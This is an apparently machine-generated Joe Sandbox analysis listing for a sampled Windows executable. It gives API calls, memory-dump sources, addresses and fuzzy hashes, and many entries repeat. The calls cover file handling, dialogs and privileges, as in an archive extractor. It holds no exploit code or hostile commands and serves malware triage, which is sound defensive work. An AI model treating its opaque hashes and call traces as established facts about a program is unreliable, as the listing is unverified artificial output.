                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E580
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E580
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: dff0a8db4d761a36e3b2254c55dd66b282db0c3780a11986cdb8073d0350dae8
                                                                                              • Instruction ID: 6a0bc248b79f5543340d1872b4ce8cf3aca45d4e6fbbb564b8d88f22e1ec1475
                                                                                              • Opcode Fuzzy Hash: dff0a8db4d761a36e3b2254c55dd66b282db0c3780a11986cdb8073d0350dae8
                                                                                              • Instruction Fuzzy Hash: 6EA011C32A8002BC3208A2A22C8AC3B022CC0C8B28330C8AEF82A880C0A88008002832
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: bdf4fae72d6a19e983441ed465561ddad0a4f24b474a0def6b870547b717e89f
                                                                                              • Instruction ID: 045121a7a56836dac3fcbb0ac14dfeb659dda09e637b7068a848da2a21483c0b
                                                                                              • Opcode Fuzzy Hash: bdf4fae72d6a19e983441ed465561ddad0a4f24b474a0def6b870547b717e89f
                                                                                              • Instruction Fuzzy Hash: D5A011C32A8002BC3208220A2E0AC3B022CC0CAFA8330C8AEF82A800C0A8800C002832
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7639a3b67a2e14e829b28192ef36698efe67f06a497fcdfc40490603dfaee536
                                                                                              • Instruction ID: 045121a7a56836dac3fcbb0ac14dfeb659dda09e637b7068a848da2a21483c0b
                                                                                              • Opcode Fuzzy Hash: 7639a3b67a2e14e829b28192ef36698efe67f06a497fcdfc40490603dfaee536
                                                                                              • Instruction Fuzzy Hash: D5A011C32A8002BC3208220A2E0AC3B022CC0CAFA8330C8AEF82A800C0A8800C002832
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: fc0136a6d928e5b14385698ca10ae6351b0d92234f53533cf4c15626a416c4e1
                                                                                              • Instruction ID: 045121a7a56836dac3fcbb0ac14dfeb659dda09e637b7068a848da2a21483c0b
                                                                                              • Opcode Fuzzy Hash: fc0136a6d928e5b14385698ca10ae6351b0d92234f53533cf4c15626a416c4e1
                                                                                              • Instruction Fuzzy Hash: D5A011C32A8002BC3208220A2E0AC3B022CC0CAFA8330C8AEF82A800C0A8800C002832
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5de1b3298815a6a7d14f0e11f865600e99cb8865ab4272edea467d653a4fb027
                                                                                              • Instruction ID: 045121a7a56836dac3fcbb0ac14dfeb659dda09e637b7068a848da2a21483c0b
                                                                                              • Opcode Fuzzy Hash: 5de1b3298815a6a7d14f0e11f865600e99cb8865ab4272edea467d653a4fb027
                                                                                              • Instruction Fuzzy Hash: D5A011C32A8002BC3208220A2E0AC3B022CC0CAFA8330C8AEF82A800C0A8800C002832
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E580
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b2e295e0e301c2246a40231e903fcb10857076a2147557a6b92f53ca84156637
                                                                                              • Instruction ID: 108662e6467020d9af87aee12c66db5b6581d8ee97618cdbcf30763f7683cc75
                                                                                              • Opcode Fuzzy Hash: b2e295e0e301c2246a40231e903fcb10857076a2147557a6b92f53ca84156637
                                                                                              • Instruction Fuzzy Hash: 44A011C32A80003C3208A2B22C8AC3B022CC0C8B2A330C2AEF828880C0A88008002832
                                                                                              APIs
                                                                                              • SetEndOfFile.KERNELBASE(?,00C6903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00C69F0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File
                                                                                              • String ID:
                                                                                              • API String ID: 749574446-0
                                                                                              • Opcode ID: 1c7a54002356647a1e01761dc3e88372c7ed9d11dac872c488baf8e283493b4b
                                                                                              • Instruction ID: 1a51e794a1b4e11d14c7356700811a92e6014c15f2526d75f5c3e4bc2bbef015
                                                                                              • Opcode Fuzzy Hash: 1c7a54002356647a1e01761dc3e88372c7ed9d11dac872c488baf8e283493b4b
                                                                                              • Instruction Fuzzy Hash: 91A0113008000A8A8E002B32CA0820C3B20EB22BC030022A8A00ACA0A2CB22882B8A20
                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00C7AE72,C:\Users\user\Desktop,00000000,00CA946A,00000006), ref: 00C7AC08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              • Opcode ID: e1437e9e5e7e80a3f1a55e4363811962d5d98aa410d7c8376397bc1587e4805f
                                                                                              • Instruction ID: c01a2527fb2cca284233590411a87584126855c195443a858cd95a80e6c12d7d
                                                                                              • Opcode Fuzzy Hash: e1437e9e5e7e80a3f1a55e4363811962d5d98aa410d7c8376397bc1587e4805f
                                                                                              • Instruction Fuzzy Hash: 8BA011302002808B82000B328F0AB0EBAAAAFA2B00F00C02AA00088030CB30C820AA00
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(000000FF,?,?,00C695D6,?,?,?,?,?,00C92641,000000FF), ref: 00C6963B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 4b90cb8c8f48d7fee32ad8c165e3367af0f0ac8b2e8e0385148509ec4f7faff0
                                                                                              • Instruction ID: 56cefb82ad5f2d13370afc978380dd49d280ceee42265cdf161f98eaae09bb35
                                                                                              • Opcode Fuzzy Hash: 4b90cb8c8f48d7fee32ad8c165e3367af0f0ac8b2e8e0385148509ec4f7faff0
                                                                                              • Instruction Fuzzy Hash: A5F05E70481B559FDB308A64C498B92B7ECEF12335F045B1EE4F6429E0D771AA8D9A40
                                                                                              APIs
                                                                                                • Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                                • Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00C7C2B1
                                                                                              • EndDialog.USER32(?,00000006), ref: 00C7C2C4
                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 00C7C2E0
                                                                                              • SetFocus.USER32(00000000), ref: 00C7C2E7
                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00C7C321
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00C7C358
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00C7C36E
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C7C38C
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7C39C
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00C7C3B8
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00C7C3D4
                                                                                              • _swprintf.LIBCMT ref: 00C7C404
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00C7C417
                                                                                              • FindClose.KERNEL32(00000000), ref: 00C7C41E
                                                                                              • _swprintf.LIBCMT ref: 00C7C477
                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00C7C48A
                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00C7C4A7
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00C7C4C7
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C7C4D7
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00C7C4F1
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00C7C509
                                                                                              • _swprintf.LIBCMT ref: 00C7C535
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00C7C548
                                                                                              • _swprintf.LIBCMT ref: 00C7C59C
                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00C7C5AF
                                                                                                • Part of subcall function 00C7AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00C7AF35
                                                                                                • Part of subcall function 00C7AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00C9E72C,?,?), ref: 00C7AF84
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                              • API String ID: 797121971-1840816070
                                                                                              • Opcode ID: c01b6674a43f654028c565e59a568f842fdc34218be2c86b7968e50113af7eee
                                                                                              • Instruction ID: d202fb3bf164abfba724189801d1268b42fc509aede4a28cab56fe65882d3b9e
                                                                                              • Opcode Fuzzy Hash: c01b6674a43f654028c565e59a568f842fdc34218be2c86b7968e50113af7eee
                                                                                              • Instruction Fuzzy Hash: 8E918272248389BFD3219BA0DC89FFF77ACEB49B00F048819F649D6091D775EA049762
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C66FAA
                                                                                              • _wcslen.LIBCMT ref: 00C67013
                                                                                              • _wcslen.LIBCMT ref: 00C67084
                                                                                                • Part of subcall function 00C67A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C67AAB
                                                                                                • Part of subcall function 00C67A9C: GetLastError.KERNEL32 ref: 00C67AF1
                                                                                                • Part of subcall function 00C67A9C: CloseHandle.KERNEL32(?), ref: 00C67B00
                                                                                                • Part of subcall function 00C6A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00C6977F,?,?,00C695CF,?,?,?,?,?,00C92641,000000FF), ref: 00C6A1F1
                                                                                                • Part of subcall function 00C6A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00C6977F,?,?,00C695CF,?,?,?,?,?,00C92641), ref: 00C6A21F
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00C67139
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C67155
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00C67298
                                                                                                • Part of subcall function 00C69DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00C673BC,?,?,?,00000000), ref: 00C69DBC
                                                                                                • Part of subcall function 00C69DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00C69E70
                                                                                                • Part of subcall function 00C69620: CloseHandle.KERNELBASE(000000FF,?,?,00C695D6,?,?,?,?,?,00C92641,000000FF), ref: 00C6963B
                                                                                                • Part of subcall function 00C6A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A501
                                                                                                • Part of subcall function 00C6A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A532
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 3983180755-3508440684
                                                                                              • Opcode ID: 6d74e5ca7454a9d337d1f0c25486f00b144500c05004a2aa9bfd132ce1fa7550
                                                                                              • Instruction ID: fc8ac461c06c0fc13ff33b28a13929cf1394c3c75da10453d5885fc3cf20053b
                                                                                              • Opcode Fuzzy Hash: 6d74e5ca7454a9d337d1f0c25486f00b144500c05004a2aa9bfd132ce1fa7550
                                                                                              • Instruction Fuzzy Hash: 2EC1F971904644AADB31DB74CCC5FEEB3ACAF04308F044A5AF95AE7282D734AB44DB65
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C7F844
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00C7F910
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C7F930
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00C7F93A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
